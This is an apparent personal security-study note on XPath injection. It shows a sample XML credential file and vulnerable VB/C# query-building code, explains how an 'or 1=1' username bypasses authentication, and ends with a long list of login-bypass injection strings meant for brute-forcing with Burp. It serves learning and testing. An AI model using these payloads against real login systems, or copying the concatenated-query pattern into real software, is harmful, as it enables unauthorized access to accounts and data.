<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../style.css">
    <base target="_parent">
    <title data-trilium-title>XPath Injection</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>XPath Injection</h1>

      <div class="ck-content">
        <p><a href="https://owasp.org/www-community/attacks/XPATH_Injection">https://owasp.org/www-community/attacks/XPATH_Injection</a> </p>
        <p>using <code>blah' or 1=1 or 'a'='a</code> or <code>blah" or 1=1 or "a"="a</code> as
          username will match ALL employees/users because of the “1=1” part.</p>
         <h2>Example Vulnerability</h2>

        <p>We’ll use this XML snippet for the examples.</p><pre><code class="language-text-plain">&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;Employees&gt;
   &lt;Employee ID="1"&gt;
      &lt;FirstName&gt;Arnold&lt;/FirstName&gt;
      &lt;LastName&gt;Baker&lt;/LastName&gt;
      &lt;UserName&gt;ABaker&lt;/UserName&gt;
      &lt;Password&gt;SoSecret&lt;/Password&gt;
      &lt;Type&gt;Admin&lt;/Type&gt;
   &lt;/Employee&gt;
   &lt;Employee ID="2"&gt;
      &lt;FirstName&gt;Peter&lt;/FirstName&gt;
      &lt;LastName&gt;Pan&lt;/LastName&gt;
      &lt;UserName&gt;PPan&lt;/UserName&gt;
      &lt;Password&gt;NotTelling&lt;/Password&gt;
      &lt;Type&gt;User&lt;/Type&gt;
   &lt;/Employee&gt;
&lt;/Employees&gt;
</code></pre>

        <p>Suppose we have a user authentication system on a web page that used a
          data file of this sort to login users. Once a username and password have
          been supplied the software might use XPath to look up the user:</p><pre><code class="language-text-plain">VB:
Dim FindUserXPath as String
FindUserXPath = "//Employee[UserName/text()='" &amp; Request("Username") &amp; "' And
        Password/text()='" &amp; Request("Password") &amp; "']"

C#:
String FindUserXPath;
FindUserXPath = "//Employee[UserName/text()='" + Request("Username") + "' And
        Password/text()='" + Request("Password") + "']";
</code></pre>

        <p>With a normal username and password this XPath would work, but an attacker
          may send a bad username and password and get an XML node selected without
          knowing the username or password, like this:</p><pre><code class="language-text-plain">Username: blah' or 1=1 or 'a'='a
Password: blah

FindUserXPath becomes //Employee[UserName/text()='blah' or 1=1 or
        'a'='a' And Password/text()='blah']

Logically this is equivalent to:
        //Employee[(UserName/text()='blah' or 1=1) or
        ('a'='a' And Password/text()='blah')]
</code></pre>

        <p>In this case, only the first part of the XPath needs to be true. The password
          part becomes irrelevant, and the UserName part will match ALL employees
          because of the “1=1” part.</p>
        <p>We can also use this list to bruteforce with burp and check the length
          of responses to find any leaked data.</p><pre><code class="language-text-plain">admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
'-'
' '
'&amp;'
'^'
'*'
' or ''-'
' or '' '
' or ''&amp;'
' or ''^'
' or ''*'
"-"
" "
"&amp;"
"^"
"*"
" or ""-"
" or "" "
" or ""&amp;"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*</code></pre>

        <p> </p>
        <p> </p>
      </div>
    </div>
  </body>

</html>